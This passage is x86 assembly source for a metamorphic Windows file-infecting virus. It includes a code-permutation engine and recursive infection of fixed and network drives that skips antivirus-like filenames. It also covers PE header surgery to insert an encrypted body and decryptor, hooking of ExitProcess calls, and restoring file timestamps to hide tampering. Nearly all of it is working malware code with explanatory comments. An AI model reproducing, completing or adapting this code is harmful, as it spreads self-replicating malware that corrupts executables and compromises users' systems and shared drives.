add eax, ebx pop ebx mov [ebx], eax add ebx, 4 sub ecx, 4 or ecx, ecx jnz @@LoopGetNewVar ret IdentifyVariables endp ;---------------------------------------------------------------------------------------- PermutateCode proc xor eax, eax mov [ebp+NumberOfJumps], eax mov edi, [ebp+FramesTable] mov ecx, [ebp+AddressOfLastInstruction] mov eax, [ebp+InstructionTable] mov esi, eax sub ecx, eax @@NextFrame: call Random and eax, 0F0h cmp eax, 050h jb @@NextFrame add eax, 0F0h mov [edi], esi add esi, eax mov [edi+4], esi mov ebx, esi @@LoopCheckInst00: sub ebx, 10h cmp ebx, [edi] jz @@CheckInst_Next00 mov edx, [ebx] and edx, 0FFh cmp edx, 0FFh jz @@LoopCheckInst00 cmp edx, 0EAh jnz @@CheckInst_Next00 @@LoopCheckInst01: add ebx, 10h cmp ebx, [ebp+AddressOfLastInstruction] jz @@CheckInst_Next00 mov edx, [ebx] and edx, 0FFh cmp edx, 0FFh jz @@LoopCheckInst01 cmp edx, 0F6h jnz @@CheckInst_Next00 
        add ebx, 10h
        sub ebx, esi
        add eax, ebx
        add esi, ebx
        mov [edi+4], esi
@@CheckInst_Next00:
        mov ebx, esi
        jmp @@DontAdd10hYet
@@LoopCheckInst02:
        add ebx, 10h
@@DontAdd10hYet:
        cmp ebx, [ebp+AddressOfLastInstruction]
        jz @@CheckInst_Next01
        mov edx, [ebx]
        and edx, 0FFh
        cmp edx, 0FFh
        jz @@LoopCheckInst02
        cmp edx, 0E9h
        jz @@CheckInst_IncludeInstruction
        cmp edx, 0FEh
        jz @@CheckInst_IncludeInstruction
        cmp edx, 0EBh
        jz @@CheckInst_IncludeInstruction
        cmp edx, 0EDh
        jz @@CheckInst_IncludeInstruction
        cmp edx, 70h
        jb @@CheckInst_Next01
        cmp edx, 7Fh
        ja @@CheckInst_Next01
@@CheckInst_IncludeInstruction:
        add ebx, 10h
        push ebx
        sub ebx, esi
        add eax, ebx
        add esi, ebx
        mov [edi+4], esi
        pop ebx
        jmp @@DontAdd10hYet
@@CheckInst_Next01:
        add edi, 8
        sub ecx, eax
        cmp ecx, 01E0h
        jae @@NextFrame
        or ecx, ecx
        jz @@FramesCreationFinished
        mov [edi], esi
        add esi, ecx
        mov [edi+4], esi
        add edi, 8
@@FramesCreationFinished:
        mov [ebp+AddressOfLastFrame], edi
@@TempLabel:
        mov eax, edi
        mov ebx, [ebp+FramesTable]
        sub eax, ebx
        mov ebx, 8
@@LoopCalculateMOD:
        shl ebx, 1
        cmp ebx, eax
        jb @@LoopCalculateMOD
        sub ebx, 8
        mov [ebp+MODValue], ebx
        mov esi, [ebp+FramesTable]
        mov [ebp+PositionOfFirstInstruction], esi
        mov edx, esi
@@LoopExchange:
        call Random
        mov ebx, [ebp+MODValue]
        and eax, ebx
        add eax, esi
;
; If this instruction is uncommented the engine doesn't permutate anything
;       mov eax, edx
        cmp eax, edi
        jae @@LoopExchange
        mov ecx, [eax]
        mov ebx, [edx]
        mov [eax], ebx
        mov [edx], ecx
        cmp edx, [ebp+PositionOfFirstInstruction]
        jnz @@LookEAX
        mov [ebp+PositionOfFirstInstruction], eax
        jmp @@ExchangeNext
@@LookEAX:
        cmp eax, [ebp+PositionOfFirstInstruction]
        jnz @@ExchangeNext
        mov [ebp+PositionOfFirstInstruction], edx
@@ExchangeNext:
        add eax, 4
        add edx, 4
        mov ecx, [eax]
        mov ebx, [edx]
        mov [eax], ebx
        mov [edx], ecx
        add edx, 4
        cmp edx, edi
        jb @@LoopExchange
        mov esi, [ebp+InstructionTable]
        mov edi, [ebp+PermutationResult]
        mov ebx, [ebp+FramesTable]
        mov eax, [ebp+PositionOfFirstInstruction]
        cmp ebx, eax
        jnz @@InsertJump2
@@LoopCopyFrame:
        mov eax, 0FFh
        mov [ebp+Permut_LastInstruction], eax
        mov edx, [ebx]
        add ebx, 4
        mov ecx, [ebx]
        add ebx, 4
@@LoopCopyInstructions:
        mov eax, [edx]
        cmp al, 4Fh
        jnz @@NextInstruction
        mov al, 51h
        mov [edx], eax
        push eax
        push ebx
        mov ebx, [edx+7]
        mov eax, 59h
        mov [ebx], al
        pop ebx
        pop eax
@@NextInstruction:
        mov [edi], eax
        mov eax, [edx+4]
        mov [edi+4], eax
        mov eax, [edx+8]
        mov [edi+8], eax
        mov [edi+0Ch], edx
        mov [edx+0Ch], edi
        mov eax, [edi]
        and eax, 0FFh
        cmp eax, 0FFh
        jz @@NextInstruction2
@@SetLastInstruction:
        mov [ebp+Permut_LastInstruction], eax
        jmp @@NextInstruction3
@@NextInstruction2:
        mov eax, [edi+0Bh]
        and eax, 0FFh
        or eax, eax
        jnz @@SetLastInstruction
@@NextInstruction3:
        add edi, 10h
        add edx, 10h
        cmp edx, ecx
        jnz @@LoopCopyInstructions
        mov eax, [ebp+AddressOfLastFrame]
        cmp ebx, eax
        jae @@LastFrameArrived
        mov eax, [ebx]
        cmp eax, edx
        jz @@LoopTestIfLastFrame
@@LastFrameArrived:
        mov eax, [ebp+Permut_LastInstruction]
        cmp eax, 0E9h
        jz @@LoopTestIfLastFrame
        cmp eax, 0EBh
        jz @@LoopTestIfLastFrame
        cmp eax, 0EDh
        jz @@LoopTestIfLastFrame
        cmp eax, 0FEh
        jz @@LoopTestIfLastFrame
        mov [edi+1], edx
@@InsertJump:
        mov eax, 0E9h
        mov [edi], al
        call InsertJumpInTable
        add edi, 10h
@@LoopTestIfLastFrame:
        mov eax, [ebp+AddressOfLastFrame]
        cmp ebx, eax
        jae @@End
        jmp @@LoopCopyFrame
@@InsertJump2:
        mov eax, [eax]
        mov [edi+1], eax
        jmp @@InsertJump
@@End:
        mov [ebp+AddressOfLastInstruction], edi
        mov ecx, [ebp+NumberOfLabels]
        mov edx, [ebp+LabelTable]
@@LoopUpdateLabel:
        mov eax, [edx+4]
        mov ebx, [eax+0Ch]
        mov [edx], ebx
        add edx, 8
        sub ecx, 1
        or ecx, ecx
        jnz @@LoopUpdateLabel
        mov ecx, [ebp+NumberOfJumps]
        mov ebx, [ebp+JumpsTable]
        jmp @@CheckNumberOfJumps
@@LoopUpdateJumps:
        mov esi, [ebx]
        mov eax, [esi+1]
        mov edi, [eax+0Ch]
        mov [edx], edi
        mov [edx+4], eax
        mov [esi+1], edx
        mov eax, [ebp+NumberOfLabels]
        add eax, 1
        mov [ebp+NumberOfLabels], eax
        add edx, 8
        add ebx, 4
        sub ecx, 4
@@CheckNumberOfJumps:
        or ecx, ecx
        jnz @@LoopUpdateJumps
        ret
PermutateCode endp

; Two-seed PRNG. RandomMod1 and RandomMod2 are 32-bit rotates (right by 13 and
; right by 17, built from and/shl/shr/or), each followed by add ecx.
Random proc
        push edx
        push ecx
        mov eax, [ebp+RndSeed1]
        mov ecx, [ebp+RndSeed2]
        add eax, ecx
        call RandomMod1
        xor eax, [ebp+RndSeed1]
        mov [ebp+RndSeed1], eax
        mov ecx, eax
        mov eax, [ebp+RndSeed2]
        add [ebp+RndSeed2], ecx
        call RandomMod2
        xor eax, [ebp+RndSeed2]
        mov [ebp+RndSeed2], eax
        xor eax, [ebp+RndSeed1]
        call RandomMod2
        pop ecx
        pop edx
        ret
Random endp

RandomMod1 proc
        mov edx, eax
        and edx, 1FFFh
        shl edx, 13h
        and eax, 0FFFFFE00h
        shr eax, 0Dh
        or eax, edx
        add eax, ecx
        ret
RandomMod1 endp

RandomMod2 proc
        mov edx, eax
        and edx, 1FFFFh
        shl edx, 0Fh
        and eax, 0FFFFE000h
        shr eax, 11h
        or eax, edx
        add eax, ecx
        ret
RandomMod2 endp

InsertJumpInTable proc
        mov ecx, [ebp+NumberOfJumps]
        mov edx, [ebp+JumpsTable]
        add edx, ecx
        mov [edx], edi
        add ecx, 4
        mov [ebp+NumberOfJumps], ecx
        ret
InsertJumpInTable endp

;----------------------------------------------------------------------------------------

; Infect the current directory, then every drive listed by GetLogicalDriveStringsA
; whose type is DRIVE_FIXED (3) or DRIVE_REMOTE (4).
InfectFiles proc
        call Random
        and eax, 3
        jnz @@DontLoop
@@LoopAgain:
        call Random
        and eax, 0FFh
        jnz @@LoopAgain
@@DontLoop:
        xor eax, eax
        mov [ebp+DirectoryDeepness], eax
        call InfectFiles2
        mov ebx, [ebp+FindFileData]
        add ebx, 1000h
@@LoopGetDrives:
        xor eax, eax
        mov [ebp+DirectoryDeepness], eax
        push eax
        push ecx
        push edx
        mov eax, [ebp+FindFileData]
        add eax, 1000h
        push eax
        mov eax, 200h
        push eax
        call dword ptr [ebp+RVA_GetLogicalDriveStringsA]
        mov [ebp+ReturnValue], eax
        pop edx
        pop ecx
        pop eax
        mov eax, [ebp+ReturnValue]
        or eax, eax
        jz @@Error2
        push eax
        push ecx
        push edx
        mov eax, ebx
        push eax
        call dword ptr [ebp+RVA_GetDriveTypeA]
        mov [ebp+ReturnValue], eax
        pop edx
        pop ecx
        pop eax
        mov eax, [ebp+ReturnValue]
        cmp eax, 3
        jz @@InfectDrive
        cmp eax, 4
        jnz @@NextDrive
        cmp eax, 6                      ; no conditional jump follows, so this compare has no effect
@@InfectDrive:
        push eax
        push ecx
        push edx
        mov eax, ebx
        push eax
        call dword ptr [ebp+RVA_SetCurrentDirectoryA]
        mov [ebp+ReturnValue], eax
        pop edx
        pop ecx
        pop eax
        mov eax, [ebp+ReturnValue]
        or eax, eax
        jz @@Error2
        push ebx
        call InfectFiles2
        pop ebx
@@NextDrive:
@@LoopFindNull:
        add ebx, 1
        mov eax, [ebx]
        and eax, 0FFh
        or eax, eax
        jnz @@LoopFindNull
        add ebx, 1
        mov eax, [ebx]
        and eax, 0FFh
        or eax, eax
        jnz @@LoopGetDrives
@@Error2:
        ret
InfectFiles endp

; Recursive directory walk (FindFirstFileA/FindNextFileA on "*.*", at most 5 levels
; deep). "." and ".." and directories whose name starts with W/w are skipped. File
; names are compared with a 1Fh mask per character, which folds case (and more):
; names beginning with "anti", "F-", "PA", "SC", "DR", "NO", "IE", "EX" or "WO" and
; names containing V/v are skipped; the extension must be .EXE, .SCR, .DAT, .OVL or
; .CPL, and every second candidate is dropped at random.
InfectFiles2 proc
        push eax
        push ecx
        push edx
        mov eax, [ebp+FindFileData]
        push eax
        mov edx, [ebp+OtherBuffers]
        push edx
        mov eax, '*.*'
        mov [edx], eax
        call dword ptr [ebp+RVA_FindFirstFileA]
        mov [ebp+ReturnValue], eax
        pop edx
        pop ecx
        pop eax
        mov eax, [ebp+ReturnValue]
        cmp eax, -1
        jz @@Error
        mov [ebp+hFindFile], eax
@@TouchAgain:
        mov edx, [ebp+FindFileData]
        mov eax, [edx]
        and eax, 10h                    ; FILE_ATTRIBUTE_DIRECTORY
        or eax, eax
        jz @@TryToInfectFile
        mov eax, [ebp+DirectoryDeepness]
        cmp eax, 5
        jz @@InfectNextFile
        mov eax, [edx+2Ch]              ; cFileName
        and eax, 0FFFFFFh
        cmp eax, '..'
        jz @@InfectNextFile
        and eax, 0FFFFh
        cmp eax, '.'
        jz @@InfectNextFile
        and eax, 01Fh
        cmp eax, 'W' AND 1Fh
        jz @@InfectNextFile
        push eax
        push ecx
        push edx
        mov eax, edx
        add eax, 2Ch
        push eax
        call dword ptr [ebp+RVA_SetCurrentDirectoryA]
        mov [ebp+ReturnValue], eax
        pop edx
        pop ecx
        pop eax
        mov eax, [ebp+ReturnValue]
        or eax, eax
        jz @@InfectNextFile
        mov eax, [ebp+DirectoryDeepness]
        add eax, 1
        mov [ebp+DirectoryDeepness], eax
        mov eax, [ebp+hFindFile]
        push eax
        call InfectFiles2
        pop eax
        mov [ebp+hFindFile], eax
        mov eax, [ebp+DirectoryDeepness]
        sub eax, 1
        mov [ebp+DirectoryDeepness], eax
        mov edx, [ebp+FindFileData]
        mov eax, '..'
        mov [edx], eax
        push eax
        push ecx
        push edx
        mov eax, edx
        push eax
        call dword ptr [ebp+RVA_SetCurrentDirectoryA]
        mov [ebp+ReturnValue], eax
        pop edx
        pop ecx
        pop eax
        mov eax, [ebp+ReturnValue]
        or eax, eax
        jz @@Error2
        jmp @@InfectNextFile
@@TryToInfectFile:
        xor eax, eax
        mov eax, 3
        call Random
        and eax, 1
        jnz @@InfectNextFile
        mov edx, [ebp+FindFileData]
        add edx, 2Ch
        mov eax, [edx]
        and eax, 1F1F1F1Fh
        cmp eax, 'itna' AND 1F1F1F1Fh
        jz @@InfectNextFile
        mov eax, [edx]
        and eax, 1F1Fh
        cmp eax, '-F' AND 1F1Fh
        jz @@InfectNextFile
        cmp eax, 'AP' AND 1F1Fh
        jz @@InfectNextFile
        cmp eax, 'CS' AND 1F1Fh
        jz @@InfectNextFile
        cmp eax, 'RD' AND 1F1Fh
        jz @@InfectNextFile
        cmp eax, 'ON' AND 1F1Fh
        jz @@InfectNextFile
        cmp eax, 'EI' AND 1F1Fh
        jz @@InfectNextFile
        cmp eax, 'XE' AND 1F1Fh
        jz @@InfectNextFile
        cmp eax, 'OW' AND 1F1Fh
        jz @@InfectNextFile
        mov ebx, edx
@@LoopFindExtension:
        mov eax, [ebx]
        and eax, 01Fh
        cmp eax, 'V' AND 1Fh
        jz @@InfectNextFile
        cmp eax, '0' AND 1Fh            ; flags are overwritten by the next instruction
        or eax, eax
        jz @@CheckExtension
        add ebx, 1
        jmp @@LoopFindExtension
@@CheckExtension:
        mov eax, [ebx-4]
        and eax, 1F1F1FFFh
        cmp eax, 'EXE.' AND 1F1F1FFFh
        jz @@InfectFile
        cmp eax, 'RCS.' AND 1F1F1FFFh
        jz @@InfectFile
        cmp eax, 'TAD.' AND 1F1F1FFFh
        jz @@InfectFile
        cmp eax, 'LVO.' AND 1F1F1FFFh
        jz @@InfectFile
        cmp eax, 'LPC.' AND 1F1F1FFFh
        jnz @@InfectNextFile
@@InfectFile:
        call TouchFile
@@InfectNextFile:
        push eax
        push ecx
        push edx
        mov eax, [ebp+FindFileData]
        push eax
        mov eax, [ebp+hFindFile]
        push eax
        call dword ptr [ebp+RVA_FindNextFileA]
        mov [ebp+ReturnValue], eax
        pop edx
        pop ecx
        pop eax
        mov eax, [ebp+ReturnValue]
        or eax, eax
        jnz @@TouchAgain
@@Error2:
        push eax
        push ecx
        push edx
        mov eax, [ebp+hFindFile]
        push eax
        call dword ptr [ebp+RVA_FindClose]
        pop edx
        pop ecx
        pop eax
@@Error:
        ret
InfectFiles2 endp

; Validate the MZ/PE headers (the PE CheckSum field at [ebx+58h] doubles as the
; infection marker and must still be zero), locate the .text/CODE, .data/DATA and
; .reloc section headers, then lay out the two holes for the decryptor and the
; encrypted body: either by overwriting the relocation section (UpdateHeaders path)
; or by carving space inside the code section or at the end of the last section.
; Returns eax = 0 on success, 1 on error.
PrepareFile proc
        mov eax, [ebp+MappingAddress]
        mov ebx, [eax]
        and ebx, 0FFFFh
        cmp ebx, 0+'ZM'
        jnz @@Error
        mov ebx, [eax+18h]              ; e_lfarlc must be 40h
        and ebx, 0FFh
        cmp ebx, 40h
        jnz @@Error
        mov ebx, [eax+3Ch]              ; e_lfanew
        add ebx, eax
        mov ecx, [ebx]
        cmp ecx, 0+'EP'
        jnz @@Error
        mov [ebp+HeaderAddress], ebx
        mov ecx, [ebx+58h]              ; CheckSum: non-zero means already infected
        or ecx, ecx
        jnz @@Error
        mov ecx, [ebx+4]
        and ecx, 0FFFFh
        cmp ecx, 014Ch                  ; IMAGE_FILE_MACHINE_I386; the jz falls through either way
        jz @@IA32
@@IA32:
        mov ecx, [ebx+6]                ; NumberOfSections
        and ecx, 0FFFFh
        mov edx, [ebx+14h]              ; SizeOfOptionalHeader
        and edx, 0FFFFh
        add edx, 18h
        add edx, ebx
        mov [ebp+StartOfSectionHeaders], edx
        xor eax, eax
        mov [ebp+RelocHeader], eax
        mov [ebp+TextHeader], eax
        mov [ebp+DataHeader], eax
@@LoopSections:
        mov eax, [edx]
        mov esi, [edx+4]
        cmp eax, 'ler.'
        jnz @@LookForCode
        cmp esi, 0+'co'
        jnz @@NextSection
        mov [ebp+RelocHeader], edx
        jmp @@NextSection
@@LookForCode:
        cmp eax, 'xet.'
        jnz @@LookForCode2
        cmp esi, 0+'t'
        jnz @@NextSection
        mov [ebp+TextHeader], edx
        jmp @@NextSection
@@LookForCode2:
        cmp eax, 'EDOC'
        jnz @@LookForData
        or esi, esi
        jnz @@NextSection
        mov [ebp+TextHeader], edx
        jmp @@NextSection
@@LookForData:
        cmp eax, 'tad.'
        jnz @@LookForData2
        cmp esi, 0+'a'
        jnz @@NextSection
        mov [ebp+DataHeader], edx
        jmp @@NextSection
@@LookForData2:
        cmp eax, 'ATAD'
        jnz @@LookForData3
        or esi, esi
        jnz @@NextSection
        mov [ebp+DataHeader], edx
        jmp @@NextSection
@@LookForData3:
@@NextSection:
        mov [ebp+LastHeader], edx
        add edx, 28h
        dec ecx
        or ecx, ecx
        jnz @@LoopSections
        xor eax, eax
        mov [ebp+ExitProcessAddress], eax
        mov [ebp+VirtualAllocAddress], eax
        mov [ebp+GetProcAddressAddress], eax
        mov [ebp+GetModuleHandleAddress], eax
        mov eax, [ebp+TextHeader]
        or eax, eax
        jz @@Error
        mov eax, [ebp+DataHeader]
        or eax, eax
        jz @@Error
        mov eax, [ebp+RelocHeader]
        or eax, eax
        jz @@NoRelocs
        mov eax, 3
        call Random
        and eax, 3
        jz @@NoRelocs2
        mov eax, [ebp+RelocHeader]
        cmp eax, [ebp+LastHeader]
        jnz @@Error
        mov eax, 1
        mov [ebp+MakingFirstHole], eax
        mov esi, [ebp+TextHeader]
        mov ecx, 2000h
        call UpdateHeaders
        mov [ebp+RVA_TextHole], edi
        mov [ebp+Phys_TextHole], eax
        mov [ebp+TextHoleSize], ecx
        mov eax, [ebp+ExitProcessAddress]
        or eax, eax
        jz @@Error
        mov eax, [ebp+GetProcAddressAddress]
        or eax, eax
        jz @@Error
        mov eax, [ebp+GetModuleHandleAddress]
        or eax, eax
        jz @@Error
        mov ebx, [ebp+HeaderAddress]
        add [ebx+1Ch], ecx              ; SizeOfCode
        add [ebp+FileSize], ecx
        xor eax, eax
        mov [ebp+MakingFirstHole], eax
        mov esi, [ebp+DataHeader]
        mov ecx, [ebp+RoundedSizeOfNewCode]
        call UpdateHeaders
        mov [ebp+RVA_DataHole], edi
        mov [ebp+Phys_DataHole], eax
        mov ebx, [ebp+HeaderAddress]
        mov eax, [ebp+ExitProcessAddress]
        add eax, [ebx+34h]              ; ImageBase
        mov [ebp+ExitProcessAddress], eax
        mov eax, [ebp+GetProcAddressAddress]
        add eax, [ebx+34h]
        mov [ebp+GetProcAddressAddress], eax
        mov eax, [ebp+GetModuleHandleAddress]
        add eax, [ebx+34h]
        mov [ebp+GetModuleHandleAddress], eax
        mov eax, [ebp+VirtualAllocAddress]
        or eax, eax
        jz @@DontAddBaseAddress
        add eax, [ebp+34h]              ; note: [ebp+34h] here, unlike the [ebx+34h] used above
        mov [ebp+VirtualAllocAddress], eax
@@DontAddBaseAddress:
        add [ebx+20h], ecx              ; SizeOfInitializedData
        add [ebp+FileSize], ecx
        mov esi, [ebp+RelocHeader]
        mov eax, [esi+0Ch]
        mov [ebx+50h], eax              ; SizeOfImage
        mov edi, [esi+14h]
        mov ecx, [ebp+FileSize]
        sub ecx, edi
        mov [ebp+FileSize], edi
        add edi, [ebp+MappingAddress]
        xor eax, eax
@@Loop0:
        call Random
        and eax, 0FCh
        mov [edi], eax
        add edi, 4
        sub ecx, 4
        or ecx, ecx
        jnz @@Loop0
        xor eax, eax
        mov ecx, 28h
@@Loop1:
        mov [esi], eax                  ; wipe the .reloc section header
        add esi, 4
        sub ecx, 4
        or ecx, ecx
        jnz @@Loop1
        mov [ebx+0A0h], eax             ; relocation data directory
        mov [ebx+0A4h], eax
        mov eax, [ebx+06h]
        sub eax, 1                      ; one section less
        mov [ebx+06h], eax
        mov eax, [ebx+16h]
        or eax, 1                       ; IMAGE_FILE_RELOCS_STRIPPED
        mov [ebx+16h], eax
        mov eax, 2000h
        mov [ebp+MaxSizeOfDecryptor], eax
        xor eax, eax
        ret
@@Error:
        mov eax, 1
        ret
@@NoRelocs2:
        xor eax, eax
        mov [ebp+RelocHeader], eax
@@NoRelocs:
        xor ecx, ecx
        mov edx, -1
        call UpdateImports
        mov ecx, [ebp+HeaderAddress]
        mov eax, [ebp+ExitProcessAddress]
        or eax, eax
        jz @@Error
        add eax, [ecx+34h]
        mov [ebp+ExitProcessAddress], eax
        mov eax, [ebp+GetProcAddressAddress]
        or eax, eax
        jz @@Error
        add eax, [ecx+34h]
        mov [ebp+GetProcAddressAddress], eax
        mov eax, [ebp+GetModuleHandleAddress]
        or eax, eax
        jz @@Error
        add eax, [ecx+34h]
        mov [ebp+GetModuleHandleAddress], eax
        mov eax, [ebp+VirtualAllocAddress]
        or eax, eax
        jz @@NoVirtualAlloc
        add eax, [ecx+34h]
        mov [ebp+VirtualAllocAddress], eax
@@NoVirtualAlloc:
        xor eax, eax
        call Random
        and eax, 07h
        jz @@HoleAtLastSection
        mov ebx, [ebp+TextHeader]
        mov eax, [ebx+10h]              ; SizeOfRawData
        cmp eax, [ebx+08h]              ; VirtualSize
        jae @@CheckPaddingSpace
        add eax, [ebx+14h]
        mov [ebp+Phys_TextHole], eax
        mov eax, [ebx+10h]
        add eax, [ebx+0Ch]
        mov [ebp+RVA_TextHole], eax
        mov eax, [ebx+08h]
        sub eax, [ebx+10h]
        cmp eax, 600h
        jb @@HoleAtLastSection
        cmp eax, 80000000h
        ja @@Error
        cmp eax, 2000h
        jbe @@TextHoleSizeOK
        mov eax, 2000h
@@TextHoleSizeOK:
        mov [ebp+MaxSizeOfDecryptor], eax
        mov edx, ebx
        mov ecx, [ebp+LastHeader]
@@LoopAddPhysicalSize:
        cmp edx, ebx
        jz @@NextAddPhysicalSize
        add [edx+14h], eax
@@NextAddPhysicalSize:
        cmp edx, ecx
        jz @@EndAddPhysicalSize
        add edx, 28h
        jmp @@LoopAddPhysicalSize
@@EndAddPhysicalSize:
        mov edx, [ebp+MappingAddress]
        mov edi, edx
        add edx, [ebx+14h]
        add edx, [ebx+10h]
        add edi, [ebp+FileSize]
        mov esi, edi
        add edi, eax
        add [ebx+10h], eax
        mov eax, 2000h
        add [ebp+FileSize], eax
@@LoopMakePhysicalHole:
        call Random
        and eax, 0FCh
        sub edi, 4
        sub esi, 4
        mov eax, [esi]
        mov [edi], eax
        cmp edi, edx
        jnz @@LoopMakePhysicalHole
        jmp @@TextHoleMade
@@HoleAtLastSection:
        mov ebx, [ebp+LastHeader]
        mov eax, [ebx+08h]
        add eax, [ebx+0Ch]
        mov [ebp+RVA_TextHole], eax
        mov eax, [ebx+08h]
        add eax, [ebx+14h]
        mov [ebp+Phys_TextHole], eax
        mov eax, 2000h
        mov [ebp+MaxSizeOfDecryptor], eax
        add [ebx+08h], eax
        add [ebx+10h], eax
        add [ebp+FileSize], eax
        mov eax, [ebx+24h]
        and eax, 0FDFFFFFFh             ; clear IMAGE_SCN_MEM_DISCARDABLE
        mov [ebx+24h], eax
        jmp @@GetDataHole
@@CheckPaddingSpace:
        mov eax, [ebx+08h]
        add eax, [ebx+0Ch]
        mov [ebp+RVA_TextHole], eax
        mov eax, [ebx+08h]
        add eax, [ebx+14h]
        mov [ebp+Phys_TextHole], eax
        mov eax, [ebx+10h]
        sub eax, [ebx+08h]
        mov [ebp+MaxSizeOfDecryptor], eax
        cmp eax, 400h
        jb @@HoleAtLastSection
        mov ecx, eax
        mov eax, [ebx+10h]
        add eax, [ebx+0Ch]
        cmp eax, [ebx+28h+0Ch]          ; must not run into the next section's VirtualAddress
        ja @@Error
        add [ebx+08h], ecx
@@TextHoleMade:
        mov ecx, [ebp+MaxSizeOfDecryptor]
        mov edi, [ebp+Phys_TextHole]
        add edi, [ebp+MappingAddress]
        xor eax, eax
        and ecx, 0FFFFFFFCh
@@LoopFillHole:
        call Random
        and eax, 0FCh
        mov [edi], eax
        add edi, 4
        sub ecx, 4
        or ecx, ecx
        jnz @@LoopFillHole
        mov eax, [ebx+08h]
        mov esi, [ebp+HeaderAddress]
        mov [esi+1Ch], eax
@@GetDataHole:
        mov ebx, [ebp+LastHeader]
        mov eax, [ebp+RoundedSizeOfNewCode]
        add [ebp+FileSize], eax
        mov ecx, [ebx+24h]
        and ecx, 80000000h              ; refuse a writable... section flag is not the test: bit 31 is IMAGE_SCN_MEM_WRITE
        or ecx, ecx
        jnz @@Error
        mov ecx, [ebx+10h]
        add ecx, [ebx+14h]
        mov [ebp+Phys_DataHole], ecx
        mov ecx, [ebx+10h]
        add ecx, [ebx+0Ch]
        mov [ebp+RVA_DataHole], ecx
        add eax, [ebx+10h]
        mov [ebx+10h], eax
        mov [ebx+08h], eax
@@AllHolesPrepared:
        mov esi, [ebp+HeaderAddress]
        mov eax, [ebx+0Ch]
        add eax, [ebx+08h]
        mov [esi+50h], eax              ; SizeOfImage
        mov edx, [ebp+ExitProcessAddress]
        mov ebx, [ebp+TextHeader]
        mov esi, [ebx+14h]
        add esi, [ebp+MappingAddress]
        mov ecx, [ebx+10h]
        sub ecx, 6
@@LoopFindExitProcess:                  ; scan the code for FF 25 / FF 15 (jmp / call [ExitProcess])
        mov eax, [esi]
        and eax, 0FFh
        cmp eax, 0FFh
        jnz @@NextInstruction
        mov eax, [esi+1]
        and eax, 0FFh
        cmp eax, 25h
        jz @@JMPMemFound
        cmp eax, 15h
        jnz @@NextInstruction
@@JMPMemFound:
        mov eax, [esi+2]
        cmp eax, edx
        jnz @@NextInstruction
        add esi, 2
        push edx
        mov edx, [ebp+HeaderAddress]
        mov edx, [edx+34h]
        add edx, [ebp+RVA_TextHole]
        call PatchExitProcess
        pop edx
        add esi, 4
@@NextInstruction:
        add esi, 1
        sub ecx, 1
        or ecx, ecx
        jnz @@LoopFindExitProcess
        xor eax, eax
        ret
PrepareFile endp

; Open the victim read/write, map it with room for the new code plus 2000h, let
; PrepareFile lay out the holes, then write the generated decryptor (MakeDecryptor)
; and the encrypted body. On failure UndoChanges reverts the header edits and the
; file is truncated back to its original size; the original timestamps (taken from
; the WIN32_FIND_DATA) and attributes are restored in either case.
TouchFile proc
        mov [ebp+Addr_FilePath], edx
        push eax
        push ecx
        push edx
        push edx
        call dword ptr [ebp+RVA_GetFileAttributesA]
        mov [ebp+ReturnValue], eax
        pop edx
        pop ecx
        pop eax
        mov eax, [ebp+ReturnValue]
        cmp eax, -1
        jz @@Error_
        mov [ebp+FileAttributes], eax
        push eax
        push ecx
        push edx
        push 80h                        ; FILE_ATTRIBUTE_NORMAL
        mov eax, [ebp+Addr_FilePath]
        push eax
        call dword ptr [ebp+RVA_SetFileAttributesA]
        mov [ebp+ReturnValue], eax
        pop edx
        pop ecx
        pop eax
        mov eax, [ebp+ReturnValue]
        or eax, eax
        jz @@Error_
        push eax
        push ecx
        push edx
        push 0                          ; hTemplateFile
        push 0                          ; dwFlagsAndAttributes
        push 3                          ; OPEN_EXISTING
        push 0                          ; lpSecurityAttributes
        push 0                          ; dwShareMode
        push 0C0000000h                 ; GENERIC_READ | GENERIC_WRITE
        push edx                        ; lpFileName
        call dword ptr [ebp+RVA_CreateFileA]
        mov [ebp+ReturnValue], eax
        pop edx
        pop ecx
        pop eax
        mov eax, [ebp+ReturnValue]
        cmp eax, -1
        jz @@Error
        mov [ebp+hFile], eax
        push eax
        push ecx
        push edx
        push 0
        push eax
        call dword ptr [ebp+RVA_GetFileSize]
        mov [ebp+ReturnValue], eax
        pop edx
        pop ecx
        pop eax
        mov eax, [ebp+ReturnValue]
        or eax, eax
        jz @@Error2
        mov [ebp+FileSize], eax
        mov [ebp+OriginalFileSize], eax
        push eax
        push ecx
        push edx
        push 0                          ; lpName
        add eax, [ebp+RoundedSizeOfNewCode]
        add eax, 2000h
        push eax                        ; dwMaximumSizeLow
        push 0                          ; dwMaximumSizeHigh
        push 4                          ; PAGE_READWRITE
        push 0                          ; lpAttributes
        mov eax, [ebp+hFile]
        push eax
        call dword ptr [ebp+RVA_CreateFileMappingA]
        mov [ebp+ReturnValue], eax
        pop edx
        pop ecx
        pop eax
        mov eax, [ebp+ReturnValue]
        or eax, eax
        jz @@Error2
        mov [ebp+hMapping], eax
        push eax
        push ecx
        push edx
        push 0
        push 0
        push 0
        push 0F001Fh                    ; FILE_MAP_ALL_ACCESS
        push eax
        call dword ptr [ebp+RVA_MapViewOfFile]
        mov [ebp+ReturnValue], eax
        pop edx
        pop ecx
        pop eax
        mov eax, [ebp+ReturnValue]
        or eax, eax
        jz @@Error3
        mov dword ptr [ebp+MappingAddress], eax
        xor eax, eax
        mov [ebp+NumberOfUndoActions], eax
        call PrepareFile
        or eax, eax
        jnz @@Error4
        mov ebx, [ebp+MappingAddress]
        add ebx, [ebp+Phys_TextHole]
        mov ecx, [ebp+MaxSizeOfDecryptor]
        cmp ecx, 600h
        jbe @@SetSizeOfExpansionTo0
        mov eax, 1
        call Random
        and eax, 1
        jz @@SetSizeOfExpansionTo0
        mov eax, -1
        jmp @@SetSizeOfExpansion
@@SetSizeOfExpansionTo0:
        mov eax, 2
        call Random
        and eax, 1
        jz @@SetSizeOfExpansionTo1
        xor eax, eax
        jmp @@SetSizeOfExpansion
@@SetSizeOfExpansionTo1:
        mov eax, 1
@@SetSizeOfExpansion:
        mov [ebp+SizeOfExpansion], eax
@@CheckWithOtherSizeOfExpansion:
        mov ecx, 9                      ; up to 9 decryptors per expansion size
@@GenerateOther:
        push ecx
        mov edi, [ebp+DecryptorPseudoCode]
        mov eax, [ebp+VirtualAllocAddress]
        push eax
        call MakeDecryptor
        pop eax
        mov [ebp+VirtualAllocAddress], eax
        pop ecx
        sub ecx, 1
        mov eax, [ebp+SizeOfDecryptor]
        cmp eax, [ebp+MaxSizeOfDecryptor]
        jbe @@SizeOfDecryptorOK
        or ecx, ecx
        jnz @@GenerateOther
